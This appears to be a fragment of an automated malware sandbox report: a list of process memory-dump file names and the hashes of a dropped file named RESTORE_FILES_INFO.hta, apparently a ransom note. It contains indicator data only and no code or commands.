memory/1600-121-0x0000000000000000-mapping.dmp

memory/1416-122-0x0000000000000000-mapping.dmp

memory/1016-123-0x0000000000000000-mapping.dmp

memory/2176-125-0x0000000000000000-mapping.dmp

memory/3292-126-0x0000000000000000-mapping.dmp

memory/3496-127-0x0000000000000000-mapping.dmp

memory/1364-124-0x0000000000000000-mapping.dmp

memory/3632-128-0x0000000000000000-mapping.dmp

memory/3640-129-0x0000000000000000-mapping.dmp

memory/940-130-0x0000000000000000-mapping.dmp

memory/1516-132-0x0000000000000000-mapping.dmp

memory/2304-131-0x0000000000000000-mapping.dmp

memory/2324-135-0x0000000000000000-mapping.dmp

memory/1972-134-0x0000000000000000-mapping.dmp

memory/3900-133-0x0000000000000000-mapping.dmp

memory/1880-136-0x0000000000000000-mapping.dmp

memory/2880-137-0x0000000000000000-mapping.dmp

memory/2232-138-0x0000000000000000-mapping.dmp

memory/2148-139-0x0000000000000000-mapping.dmp

memory/3536-140-0x0000000000000000-mapping.dmp

memory/3212-141-0x0000000000000000-mapping.dmp

memory/3116-142-0x0000000000000000-mapping.dmp

memory/3444-143-0x0000000000000000-mapping.dmp

memory/1856-144-0x0000000000000000-mapping.dmp

memory/2292-145-0x0000000000000000-mapping.dmp

memory/1272-146-0x0000000000000000-mapping.dmp

memory/2180-147-0x0000000000000000-mapping.dmp

memory/2072-148-0x0000000000000000-mapping.dmp

memory/740-149-0x0000000000000000-mapping.dmp

memory/3900-150-0x0000000000000000-mapping.dmp

memory/3508-151-0x0000000000000000-mapping.dmp

memory/2220-152-0x0000000000000000-mapping.dmp

memory/2724-153-0x0000000000000000-mapping.dmp

memory/788-154-0x0000000000000000-mapping.dmp

memory/188-155-0x0000000000000000-mapping.dmp

memory/3188-156-0x0000000000000000-mapping.dmp

memory/2624-157-0x0000000000000000-mapping.dmp

memory/1600-158-0x0000000000000000-mapping.dmp

memory/1016-159-0x0000000000000000-mapping.dmp

memory/3916-160-0x0000000000000000-mapping.dmp

memory/1856-161-0x0000000000000000-mapping.dmp

memory/3612-162-0x0000000000000000-mapping.dmp

memory/2612-163-0x0000000000000000-mapping.dmp

memory/2340-164-0x0000000000000000-mapping.dmp

memory/1416-165-0x0000000000000000-mapping.dmp

memory/3992-166-0x0000000000000000-mapping.dmp

memory/60-167-0x0000000000000000-mapping.dmp

memory/3592-168-0x0000000000000000-mapping.dmp

memory/2308-169-0x0000000000000000-mapping.dmp

memory/3820-170-0x0000000000000000-mapping.dmp

memory/1688-171-0x0000000000000000-mapping.dmp

memory/3640-172-0x0000000000000000-mapping.dmp

memory/3884-173-0x0000000000000000-mapping.dmp

memory/2192-174-0x0000000000000000-mapping.dmp

memory/3548-175-0x0000000000000000-mapping.dmp

memory/2148-176-0x0000000000000000-mapping.dmp

memory/184-177-0x0000000000000000-mapping.dmp

memory/1856-178-0x0000000000000000-mapping.dmp

memory/1856-185-0x0000021D64D70000-0x0000021D64D71000-memory.dmp

memory/3212-184-0x0000000000000000-mapping.dmp

memory/1856-186-0x0000021D64E60000-0x0000021D64E62000-memory.dmp

memory/1856-187-0x0000021D64E63000-0x0000021D64E65000-memory.dmp

memory/1856-190-0x0000021D65900000-0x0000021D65901000-memory.dmp

memory/1856-202-0x0000021D64E66000-0x0000021D64E68000-memory.dmp

memory/736-203-0x0000000000000000-mapping.dmp

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

MD5 c8a691a524b123d097075cf69adf7a99
SHA1 617cb5a03a9483f16eb87d9377c2adda64e0574f
SHA256 5a34124d8dd61ca3d2b98eb5555668718c7730d0a496d24b113c9512d460c7b9
SHA512 d330ae81d8d56099a8f4024cb2740b8464e32541569fccf46a2579a9db41e8d109a2c9f44192a0f0268c3ce7de7a036f3b25e64ee27bebb7cbc6a866267f77b3